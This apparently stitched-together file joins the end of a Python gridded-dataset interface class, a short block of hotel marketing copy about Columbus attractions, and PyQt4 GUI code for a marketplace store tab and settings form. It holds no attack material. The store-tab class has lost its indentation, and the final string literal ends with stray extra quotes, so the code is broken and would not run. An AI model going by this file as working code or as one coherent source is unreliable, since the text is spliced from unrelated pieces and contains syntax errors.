            cols = [dataset.get_dimension(d, strict=True) for d in cols]

        if np.isscalar(rows):
            rows = [rows]

        new_data = []
        for d in cols:
            new_data.append(cls.values(dataset, d, compute=False)[rows])

        if scalar:
            da = dask_array_module()
            if new_data and (da and isinstance(new_data[0], da.Array)):
                return new_data[0].compute()[0]
            return new_data[0][0]
        return tuple(new_data)

    @classmethod
    def range(cls, dataset, dimension):
        """Return the (min, max) of ``dimension``, handling datetimes,
        dask arrays, empty columns and non-numeric fallback sorting."""
        if dataset._binned and dimension in dataset.kdims:
            # Binned key dims: range spans the bin edges, not the centers.
            expanded = cls.irregular(dataset, dimension)
            column = cls.coords(dataset, dimension, expanded=expanded, edges=True)
        else:
            column = cls.values(dataset, dimension, expanded=False, flat=False)

        da = dask_array_module()
        if column.dtype.kind == 'M':
            dmin, dmax = column.min(), column.max()
            if da and isinstance(column, da.Array):
                return da.compute(dmin, dmax)
            return dmin, dmax
        elif len(column) == 0:
            # NOTE(review): np.NaN is a legacy alias (removed in NumPy 2.0).
            return np.NaN, np.NaN
        else:
            try:
                dmin, dmax = (np.nanmin(column), np.nanmax(column))
                if da and isinstance(column, da.Array):
                    return da.compute(dmin, dmax)
                return dmin, dmax
            except TypeError:
                # Non-numeric data: fall back to an in-place sort.
                column.sort()
                return column[0], column[-1]


# Make this interface available for Dataset construction by datatype.
Interface.register(GridInterface)
|
We’re one of the top hotels near Ohio State University (the nation’s second largest college campus).
Shop at the premier stores at Columbus's shopping mecca, the nearby Polaris Fashion Place.
Visit exotic and familiar animals and sea life at the nationally renowned Columbus Zoo & Aquarium.
A chic & complete mall, with names like Saks Fifth Avenue & Kaufmann's. 50 specialty shops & dining.
Enjoy the best in film entertainment, located in Crosswoods Center.
Go-Karts, Miniature Golf, Laser Tag, Bumper Boats and so much more!
Spend the day at this fascinating zoo or cool off in the water park.
|
# -*- coding: utf-8 -*-
#
# Created: Fri Nov 13 14:07:26 2015
# by: PyQt4 UI code generator 4.10.4
#
# WARNING! All changes made in this file will be lost!
import hashlib
from PyQt4 import QtCore, QtGui
# PyQt4 compatibility shims: QString.fromUtf8 and QApplication.UnicodeUTF8
# are absent under API v2 / newer PyQt builds, so fall back to the identity
# function and the two-argument translate respectively.
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    def _fromUtf8(s):
        # Strings are already unicode; pass through unchanged.
        return s

try:
    _encoding = QtGui.QApplication.UnicodeUTF8

    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig)
##
# StoreTab2
# This class is the GUI for a user's store.
class storeTab2(QtGui.QWidget):
##
# Constructor
# Creates a users store for viewing.
# @param store: holds store data representation
def __init__(self, merchant_representation):
super(storeTab2, self).__init__()
self.setObjectName(_fromUtf8("Form"))
self.resize(1038, 686)
self.label_11 = QtGui.QLabel(self)
self.label_11.setGeometry(QtCore.QRect(540, 6, 231, 211))
self.label_11.setText(_fromUtf8(""))
self.label_11.setObjectName(_fromUtf8("label_11"))
self.label_12 = QtGui.QLabel(self)
self.label_12.setGeometry(QtCore.QRect(0, 460, 111, 17))
self.label_12.setObjectName(_fromUtf8("label_12"))
##
# Set up table of user contracts and headers
self.contractTable = QtGui.QTableWidget(self)
self.contractTable.setGeometry(QtCore.QRect(0, 480, 1031, 201))
self.contractTable.setObjectName(_fromUtf8("contractTable"))
self.contractTable.setColumnCount(4)
item = QtGui.QTableWidgetItem()
item.setText("Item Name")
self.contractTable.setHorizontalHeaderItem(0, item)
item = QtGui.QTableWidgetItem()
item.setText("Price")
self.contractTable.setHorizontalHeaderItem(1, item)
item = QtGui.QTableWidgetItem()
item.setText("Expiry")
self.contractTable.setHorizontalHeaderItem(2, item)
item = QtGui.QTableWidgetItem()
item.setText("Description")
self.contractTable.setHorizontalHeaderItem(3, item)
self.contractTable.itemClicked.connect(self.contract_clicked)
##
# Add listings to table of contracts
for count, listing in enumerate(merchant_representation.get_listings()):
trade_info = listing.get_module('trade')
metadata = listing.get_module('metadata')
##
# Set row label to contract hash
self.contractTable.setRowCount(count + 1)
item = QtGui.QTableWidgetItem()
item.setText(str(listing.contract_hash()))
item.setData(QtCore.Qt.UserRole, listing)
self.contractTable.setVerticalHeaderItem(count, item)
item = QtGui.QTableWidgetItem()
item.setText(trade_info['name'])
item.setData(QtCore.Qt.UserRole, listing)
self.contractTable.setItem(count, 0, item)
item = QtGui.QTableWidgetItem()
item.setText(trade_info['price'])
item.setData(QtCore.Qt.UserRole, listing)
self.contractTable.setItem(count, 1, item)
item = QtGui.QTableWidgetItem()
item.setText(metadata['expiry'])
item.setData(QtCore.Qt.UserRole, listing)
self.contractTable.setItem(count, 2, item)
item = QtGui.QTableWidgetItem()
item.setText(trade_info['description'])
item.setData(QtCore.Qt.UserRole, listing)
self.contractTable.setItem(count, 3, item)
self.gridLayoutWidget = QtGui.QWidget(self)
self.gridLayoutWidget.setGeometry(QtCore.QRect(0, 10, 771, 406))
self.gridLayoutWidget.setObjectName(_fromUtf8("gridLayoutWidget"))
self.gridLayout = QtGui.QGridLayout(self.gridLayoutWidget)
self.gridLayout.setMargin(0)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.publicKey = QtGui.QTextEdit(self.gridLayoutWidget)
self.publicKey.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.publicKey.setObjectName(_fromUtf8("publicKey"))
self.gridLayout.addWidget(self.publicKey, 3, 1, 1, 1)
self.GUID = QtGui.QTextEdit(self.gridLayoutWidget)
self.GUID.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.GUID.setObjectName(_fromUtf8("GUID"))
self.gridLayout.addWidget(self.GUID, 2, 1, 1, 1)
self.label_4 = QtGui.QLabel(self.gridLayoutWidget)
self.label_4.setObjectName(_fromUtf8("label_4"))
self.gridLayout.addWidget(self.label_4, 3, 0, 1, 1)
self.storeEmail = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(18)
self.storeEmail.setFont(font)
self.storeEmail.setText(_fromUtf8(""))
self.storeEmail.setObjectName(_fromUtf8("storeEmail"))
self.gridLayout.addWidget(self.storeEmail, 1, 1, 1, 1)
self.storeName = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(22)
self.storeName.setFont(font)
self.storeName.setText(_fromUtf8(""))
self.storeName.setObjectName(_fromUtf8("storeName"))
self.gridLayout.addWidget(self.storeName, 0, 1, 1, 1)
self.bitcoinReceivingAddress = QtGui.QTextEdit(self.gridLayoutWidget)
self.bitcoinReceivingAddress.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.bitcoinReceivingAddress.setObjectName(_fromUtf8("bitcoinReceivingAddress"))
self.gridLayout.addWidget(self.bitcoinReceivingAddress, 4, 1, 1, 1)
self.label = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(22)
self.label.setFont(font)
self.label.setObjectName(_fromUtf8("label"))
self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
self.label_3 = QtGui.QLabel(self.gridLayoutWidget)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.gridLayout.addWidget(self.label_3, 2, 0, 1, 1)
self.label_2 = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(18)
self.label_2.setFont(font)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.gridLayout.addWidget(self.label_2, 1, 0, 1, 1)
self.label_5 = QtGui.QLabel(self.gridLayoutWidget)
self.label_5.setObjectName(_fromUtf8("label_5"))
self.gridLayout.addWidget(self.label_5, 4, 0, 1, 1)
self.storeDescription = QtGui.QTextEdit(self.gridLayoutWidget)
self.storeDescription.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.storeDescription.setObjectName(_fromUtf8("storeDescription"))
self.gridLayout.addWidget(self.storeDescription, 5, 1, 1, 1)
self.label_6 = QtGui.QLabel(self.gridLayoutWidget)
self.label_6.setObjectName(_fromUtf8("label_6"))
self.gridLayout.addWidget(self.label_6, 5, 0, 1, 1)
self.avatar_label = QtGui.QLabel(self)
self.avatar_label.setGeometry(QtCore.QRect(800, 20, 221, 211))
self.avatar_label.setText(_fromUtf8(""))
self.avatar_label.setObjectName(_fromUtf8("label_8"))
self.setWindowTitle(_translate("Form", "Form", None))
self.label_12.setText(_translate("Form", "My Listings:", None))
self.label.setText(_translate("Form", "User Name:", None))
self.label_3.setText(_translate("Form", "GUID:", None))
self.label_2.setText(_translate("Form", "User Email:", None))
self.label_5.setText(_translate("Form", "Bitcoin Receiving Address:", None))
self.label_6.setText(_translate("Form", "Store Description", None))
self.label_4.setText(_translate("Form", "Public Key:", None))
##
# Set values in this tab
self.storeName.setText(merchant_representation.get_name())
self.storeEmail.setText(merchant_representation.get_email())
self.storeDescription.setText(merchant_representation.get_description())
self.bitcoinReceivingAddress.setText(merchant_representation.get_bitcoin_address())
self.GUID.setText(merchant_representation.get_guid())
self.publicKey.setText(merchant_representation.get_key())
self.avatar_label.setPixmap(merchant_representation.get_avatar().get_repr().toqpixmap())
self.avatar_label.setScaledContents(True)
##
# This method describes the action to be taken when a contract hash is clicked
def contract_clicked(self, item):
##
# Try to get contract data from item
try:
ric_repr = item.data(QtCore.Qt.UserRole).toPyObject()
except:
print 'exception'
return
scroll_area = QtGui.QScrollArea()
scroll_area.setWidget(contractView_Tab(ric_repr))
self.window().add_tab(scroll_area, ric_repr.get_itemname())
##
# Settings_Ui2
# This class is the GUI for the settings tab
# @param settings_dict: holds all the current user settings for drawing on the widget
class Settings_Ui2(QtGui.QWidget):
    ##
    # Constructor
    # Builds the settings form (communication, store details, notary,
    # keys, shipping sections) and pre-fills every field from settings_dict.
    # @param settings_dict: dict read below with keys 'email', 'nickname',
    #        'bitcoinReceivingAddress', 'storeDescription', 'pubkey',
    #        'description', 'percentage', 'guid' and a nested
    #        'shippingInformation' dict — see the fill-in block at the end.
    def __init__(self, settings_dict):
        super(Settings_Ui2, self).__init__()
        self.setObjectName(_fromUtf8("Settings_Ui2"))
        self.resize(800, 1300)
        self.verticalLayoutWidget = QtGui.QWidget(self)
        self.verticalLayoutWidget.setGeometry(QtCore.QRect(10, 10, 771, 1201))
        self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
        self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)
        self.verticalLayout.setMargin(0)
        self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
        ##
        # Communication-info section (email field).
        self.gridLayout_5 = QtGui.QGridLayout()
        self.gridLayout_5.setObjectName(_fromUtf8("gridLayout_5"))
        self.email_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
        self.email_lineEdit.setObjectName(_fromUtf8("email_lineEdit"))
        self.gridLayout_5.addWidget(self.email_lineEdit, 1, 1, 1, 1)
        self.email_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.email_label.setFont(font)
        self.email_label.setObjectName(_fromUtf8("email_label"))
        self.gridLayout_5.addWidget(self.email_label, 1, 0, 1, 1)
        self.communication_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setPointSize(14)
        font.setBold(True)
        font.setWeight(75)
        self.communication_label.setFont(font)
        self.communication_label.setObjectName(_fromUtf8("communication_label"))
        self.gridLayout_5.addWidget(self.communication_label, 0, 0, 1, 1)
        self.verticalLayout.addLayout(self.gridLayout_5)
        ##
        # Store-details section (nickname, bitcoin address, description).
        self.gridLayout = QtGui.QGridLayout()
        self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
        self.bitcoin_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
        self.bitcoin_lineEdit.setObjectName(_fromUtf8("bitcoin_lineEdit"))
        self.gridLayout.addWidget(self.bitcoin_lineEdit, 2, 1, 1, 1)
        self.store_desc_edit = QtGui.QTextEdit(self.verticalLayoutWidget)
        self.store_desc_edit.setObjectName(_fromUtf8("store_desc_edit"))
        self.gridLayout.addWidget(self.store_desc_edit, 3, 1, 1, 1)
        self.nickname_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.nickname_label.setFont(font)
        self.nickname_label.setObjectName(_fromUtf8("nickname_label"))
        self.gridLayout.addWidget(self.nickname_label, 1, 0, 1, 1)
        # NOTE(review): nickname_lineEdit never gets a setObjectName call —
        # looks like a generator omission; harmless unless styled by name.
        self.nickname_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
        self.gridLayout.addWidget(self.nickname_lineEdit, 1, 1, 1, 1)
        self.bitcoin_address_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.bitcoin_address_label.setFont(font)
        self.bitcoin_address_label.setObjectName(_fromUtf8("bitcoin_address_label"))
        self.gridLayout.addWidget(self.bitcoin_address_label, 2, 0, 1, 1)
        self.store_details_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setPointSize(14)
        font.setBold(True)
        font.setWeight(75)
        self.store_details_label.setFont(font)
        self.store_details_label.setObjectName(_fromUtf8("store_details_label"))
        self.gridLayout.addWidget(self.store_details_label, 0, 0, 1, 1)
        self.store_desc_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.store_desc_label.setFont(font)
        self.store_desc_label.setObjectName(_fromUtf8("store_desc_label"))
        self.gridLayout.addWidget(self.store_desc_label, 3, 0, 1, 1)
        self.verticalLayout.addLayout(self.gridLayout)
        ##
        # Trusted-notaries section (add-notary line + button).
        self.gridLayout_3 = QtGui.QGridLayout()
        self.gridLayout_3.setObjectName(_fromUtf8("gridLayout_3"))
        self.add_notary_label = QtGui.QPushButton(self.verticalLayoutWidget)
        self.add_notary_label.setObjectName(_fromUtf8("add_notary_label"))
        self.gridLayout_3.addWidget(self.add_notary_label, 4, 1, 1, 1)
        self.known_notaries_label = QtGui.QLabel(self.verticalLayoutWidget)
        self.known_notaries_label.setObjectName(_fromUtf8("known_notaries_label"))
        self.gridLayout_3.addWidget(self.known_notaries_label, 3, 0, 1, 1)
        self.trusted_notaries_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setPointSize(14)
        font.setBold(True)
        font.setWeight(75)
        self.trusted_notaries_label.setFont(font)
        self.trusted_notaries_label.setObjectName(_fromUtf8("trusted_notaries_label"))
        self.gridLayout_3.addWidget(self.trusted_notaries_label, 1, 0, 1, 1)
        self.add_notary_line = QtGui.QLineEdit(self.verticalLayoutWidget)
        self.add_notary_line.setObjectName(_fromUtf8("add_notary_line"))
        self.gridLayout_3.addWidget(self.add_notary_line, 4, 0, 1, 1)
        ##
        # OpenBazaar-keys section (nested into gridLayout_3 below).
        self.gridLayout_4 = QtGui.QGridLayout()
        self.gridLayout_4.setObjectName(_fromUtf8("gridLayout_4"))
        self.bitcoin_pubkey_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.bitcoin_pubkey_label.setFont(font)
        self.bitcoin_pubkey_label.setObjectName(_fromUtf8("bitcoin_pubkey_label"))
        self.gridLayout_4.addWidget(self.bitcoin_pubkey_label, 1, 0, 1, 1)
        self.keys_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setPointSize(14)
        font.setBold(True)
        font.setWeight(75)
        self.keys_label.setFont(font)
        self.keys_label.setObjectName(_fromUtf8("keys_label"))
        self.gridLayout_4.addWidget(self.keys_label, 0, 0, 1, 1)
        self.guid_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.guid_label.setFont(font)
        self.guid_label.setObjectName(_fromUtf8("guid_label"))
        self.gridLayout_4.addWidget(self.guid_label, 2, 0, 1, 1)
        self.gpg_pubkey_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.gpg_pubkey_label.setFont(font)
        self.gpg_pubkey_label.setObjectName(_fromUtf8("gpg_pubkey_label"))
        self.gridLayout_4.addWidget(self.gpg_pubkey_label, 3, 0, 1, 1)
        self.guid_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
        self.guid_lineEdit.setObjectName(_fromUtf8("guid_lineEdit"))
        self.gridLayout_4.addWidget(self.guid_lineEdit, 2, 1, 1, 1)
        self.pubkey_textedit = QtGui.QTextEdit(self.verticalLayoutWidget)
        self.pubkey_textedit.setObjectName(_fromUtf8("pubkey_textedit"))
        self.gridLayout_4.addWidget(self.pubkey_textedit, 3, 1, 1, 1)
        self.bitcoin_pubkey_textEdit = QtGui.QTextEdit(self.verticalLayoutWidget)
        self.bitcoin_pubkey_textEdit.setObjectName(_fromUtf8("bitcoin_pubkey_textEdit"))
        self.gridLayout_4.addWidget(self.bitcoin_pubkey_textEdit, 1, 1, 1, 1)
        self.gridLayout_3.addLayout(self.gridLayout_4, 0, 0, 1, 1)
        self.verticalLayout.addLayout(self.gridLayout_3)
        ##
        # Notary-details section (opt-in, fee percentage, service description).
        self.gridLayout_2 = QtGui.QGridLayout()
        self.gridLayout_2.setObjectName(_fromUtf8("gridLayout_2"))
        self.notary_details_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setPointSize(14)
        font.setBold(True)
        font.setWeight(75)
        self.notary_details_label.setFont(font)
        self.notary_details_label.setObjectName(_fromUtf8("notary_details_label"))
        self.gridLayout_2.addWidget(self.notary_details_label, 0, 0, 1, 1)
        self.notary_percent_about_label = QtGui.QTextBrowser(self.verticalLayoutWidget)
        self.notary_percent_about_label.setAutoFillBackground(False)
        self.notary_percent_about_label.setObjectName(_fromUtf8("notary_percent_about_label"))
        self.gridLayout_2.addWidget(self.notary_percent_about_label, 2, 1, 1, 1)
        self.buttonBox = QtGui.QDialogButtonBox(self.verticalLayoutWidget)
        self.buttonBox.setLayoutDirection(QtCore.Qt.RightToLeft)
        self.buttonBox.setStandardButtons(QtGui.QDialogButtonBox.No|QtGui.QDialogButtonBox.Yes)
        self.buttonBox.setObjectName(_fromUtf8("buttonBox"))
        self.gridLayout_2.addWidget(self.buttonBox, 1, 1, 1, 1)
        # Fee-percentage combo box: 11 blank items here, labelled "0".."10"
        # by the setItemText calls further down.
        self.percent_comboBox = QtGui.QComboBox(self.verticalLayoutWidget)
        self.percent_comboBox.setObjectName(_fromUtf8("percent_comboBox"))
        self.percent_comboBox.addItem(_fromUtf8(""))
        self.percent_comboBox.addItem(_fromUtf8(""))
        self.percent_comboBox.addItem(_fromUtf8(""))
        self.percent_comboBox.addItem(_fromUtf8(""))
        self.percent_comboBox.addItem(_fromUtf8(""))
        self.percent_comboBox.addItem(_fromUtf8(""))
        self.percent_comboBox.addItem(_fromUtf8(""))
        self.percent_comboBox.addItem(_fromUtf8(""))
        self.percent_comboBox.addItem(_fromUtf8(""))
        self.percent_comboBox.addItem(_fromUtf8(""))
        self.percent_comboBox.addItem(_fromUtf8(""))
        self.gridLayout_2.addWidget(self.percent_comboBox, 3, 1, 1, 1)
        self.make_notary_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.make_notary_label.setFont(font)
        self.make_notary_label.setObjectName(_fromUtf8("make_notary_label"))
        self.gridLayout_2.addWidget(self.make_notary_label, 1, 0, 1, 1)
        self.percent_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.percent_label.setFont(font)
        self.percent_label.setLayoutDirection(QtCore.Qt.LeftToRight)
        self.percent_label.setObjectName(_fromUtf8("percent_label"))
        self.gridLayout_2.addWidget(self.percent_label, 3, 0, 1, 1)
        self.service_description_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.service_description_label.setFont(font)
        self.service_description_label.setObjectName(_fromUtf8("service_description_label"))
        self.gridLayout_2.addWidget(self.service_description_label, 4, 0, 1, 1)
        self.notary_servicedesc_textEdit = QtGui.QTextEdit(self.verticalLayoutWidget)
        self.notary_servicedesc_textEdit.setObjectName(_fromUtf8("notary_servicedesc_textEdit"))
        self.gridLayout_2.addWidget(self.notary_servicedesc_textEdit, 4, 1, 1, 1)
        self.verticalLayout.addLayout(self.gridLayout_2)
        ##
        # Shipping-information section (recipient, street, city, etc.).
        self.gridLayout_6 = QtGui.QGridLayout()
        self.gridLayout_6.setObjectName(_fromUtf8("gridLayout_6"))
        self.shipping_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setPointSize(14)
        font.setBold(True)
        font.setWeight(75)
        self.shipping_label.setFont(font)
        self.shipping_label.setObjectName(_fromUtf8("shipping_label"))
        self.gridLayout_6.addWidget(self.shipping_label, 0, 0, 1, 1)
        self.city_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.city_label.setFont(font)
        self.city_label.setObjectName(_fromUtf8("city_label"))
        self.gridLayout_6.addWidget(self.city_label, 5, 0, 1, 1)
        self.recipient_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.recipient_label.setFont(font)
        self.recipient_label.setObjectName(_fromUtf8("recipient_label"))
        self.gridLayout_6.addWidget(self.recipient_label, 2, 0, 1, 1)
        self.recipient_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
        self.recipient_lineEdit.setObjectName(_fromUtf8("recipient_lineEdit"))
        self.gridLayout_6.addWidget(self.recipient_lineEdit, 2, 1, 1, 1)
        self.province_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.province_label.setFont(font)
        self.province_label.setObjectName(_fromUtf8("province_label"))
        self.gridLayout_6.addWidget(self.province_label, 6, 0, 1, 1)
        self.zip_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.zip_label.setFont(font)
        self.zip_label.setObjectName(_fromUtf8("zip_label"))
        self.gridLayout_6.addWidget(self.zip_label, 7, 0, 1, 1)
        self.street1_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.street1_label.setFont(font)
        self.street1_label.setObjectName(_fromUtf8("street1_label"))
        self.gridLayout_6.addWidget(self.street1_label, 3, 0, 1, 1)
        self.street2_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.street2_label.setFont(font)
        self.street2_label.setObjectName(_fromUtf8("street2_label"))
        self.gridLayout_6.addWidget(self.street2_label, 4, 0, 1, 1)
        self.country_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.country_label.setFont(font)
        self.country_label.setObjectName(_fromUtf8("country_label"))
        self.gridLayout_6.addWidget(self.country_label, 8, 0, 1, 1)
        # NOTE(review): street1_lineEdit also lacks a setObjectName call.
        self.street1_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
        self.gridLayout_6.addWidget(self.street1_lineEdit, 3, 1, 1, 1)
        self.street2_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
        self.street2_lineEdit.setObjectName(_fromUtf8("street2_lineEdit"))
        self.gridLayout_6.addWidget(self.street2_lineEdit, 4, 1, 1, 1)
        self.city_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
        self.city_lineEdit.setObjectName(_fromUtf8("city_lineEdit"))
        self.gridLayout_6.addWidget(self.city_lineEdit, 5, 1, 1, 1)
        self.province_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
        self.province_lineEdit.setObjectName(_fromUtf8("province_lineEdit"))
        self.gridLayout_6.addWidget(self.province_lineEdit, 6, 1, 1, 1)
        self.zip_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
        self.zip_lineEdit.setObjectName(_fromUtf8("zip_lineEdit"))
        self.gridLayout_6.addWidget(self.zip_lineEdit, 7, 1, 1, 1)
        self.country_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
        self.country_lineEdit.setObjectName(_fromUtf8("country_lineEdit"))
        self.gridLayout_6.addWidget(self.country_lineEdit, 8, 1, 1, 1)
        self.encryption_message = QtGui.QTextBrowser(self.verticalLayoutWidget)
        self.encryption_message.setObjectName(_fromUtf8("encryption_message"))
        self.gridLayout_6.addWidget(self.encryption_message, 1, 0, 1, 2)
        self.verticalLayout.addLayout(self.gridLayout_6)
        self.save_button = QtGui.QPushButton(self)
        self.save_button.setGeometry(QtCore.QRect(680, 1220, 98, 27))
        self.save_button.setObjectName(_fromUtf8("save_button"))
        ##
        # Translated / static UI strings (pyuic retranslate block, inlined).
        self.setWindowTitle(_translate("Form", "Form", None))
        self.email_label.setText(_translate("Form", "Email", None))
        self.communication_label.setText(_translate("Form", "Communication Info", None))
        self.bitcoin_lineEdit.setText(_translate("Form", "Bitcoin address to send all incoming fees or refunds to", None))
        self.store_desc_edit.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
        "<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
        "p, li { white-space: pre-wrap; }\n"
        "</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
        "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Enter a short description about your store</p></body></html>", None))
        self.nickname_label.setText(_translate("Form", "Nickname", None))
        self.bitcoin_address_label.setText(_translate("Form", "Bitcoin Receiving Address", None))
        self.store_details_label.setText(_translate("Form", "Store Details", None))
        self.store_desc_label.setText(_translate("Form", "Store Description", None))
        self.add_notary_label.setText(_translate("Form", "Add", None))
        self.known_notaries_label.setText(_translate("Form", "The addresses below are notaries used during transactions.", None))
        self.trusted_notaries_label.setText(_translate("Form", "Trusted Notaries", None))
        self.add_notary_line.setText(_translate("Form", "Enter a notary\'s OB guid", None))
        self.bitcoin_pubkey_label.setText(_translate("Form", "Bitcoin Public Key (Uncompressed)", None))
        self.keys_label.setText(_translate("Form", "OpenBazaar Keys", None))
        self.guid_label.setText(_translate("Form", "OpenBazaar GUID", None))
        self.gpg_pubkey_label.setText(_translate("Form", "PGP Public Key", None))
        self.notary_details_label.setText(_translate("Form", "Notary Details", None))
        self.notary_percent_about_label.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
        "<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
        "p, li { white-space: pre-wrap; }\n"
        "</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
        "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-weight:600;\">Fees</span></p>\n"
        "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">If your services are needed during a dispute, a fee can be requested from the participants of the transaction you are involved with. What percentage of each transaction would you like to request for your services?</p></body></html>", None))
        self.percent_comboBox.setItemText(0, _translate("Form", "0", None))
        self.percent_comboBox.setItemText(1, _translate("Form", "1", None))
        self.percent_comboBox.setItemText(2, _translate("Form", "2", None))
        self.percent_comboBox.setItemText(3, _translate("Form", "3", None))
        self.percent_comboBox.setItemText(4, _translate("Form", "4", None))
        self.percent_comboBox.setItemText(5, _translate("Form", "5", None))
        self.percent_comboBox.setItemText(6, _translate("Form", "6", None))
        self.percent_comboBox.setItemText(7, _translate("Form", "7", None))
        self.percent_comboBox.setItemText(8, _translate("Form", "8", None))
        self.percent_comboBox.setItemText(9, _translate("Form", "9", None))
        self.percent_comboBox.setItemText(10, _translate("Form", "10", None))
        self.make_notary_label.setText(_translate("Form", "Make me a notary", None))
        self.percent_label.setText(_translate("Form", "%", None))
        self.service_description_label.setText(_translate("Form", "Description of your services", None))
        self.shipping_label.setText(_translate("Form", "Shipping Information", None))
        self.city_label.setText(_translate("Form", "City", None))
        self.recipient_label.setText(_translate("Form", "Recipient Name", None))
        self.recipient_lineEdit.setText(_translate("Form", "Name visible on your package", None))
        self.province_label.setText(_translate("Form", "Province/Region", None))
        self.zip_label.setText(_translate("Form", "Zip", None))
        self.street1_label.setText(_translate("Form", "Street 1", None))
        self.street2_label.setText(_translate("Form", "Street 2", None))
        self.country_label.setText(_translate("Form", "Country", None))
        self.encryption_message.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
        "<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
        "p, li { white-space: pre-wrap; }\n"
        "</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
        "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Note: This information will be encrypted and only be sent to your seller when you have marked your order for payment.</p></body></html>""", None))
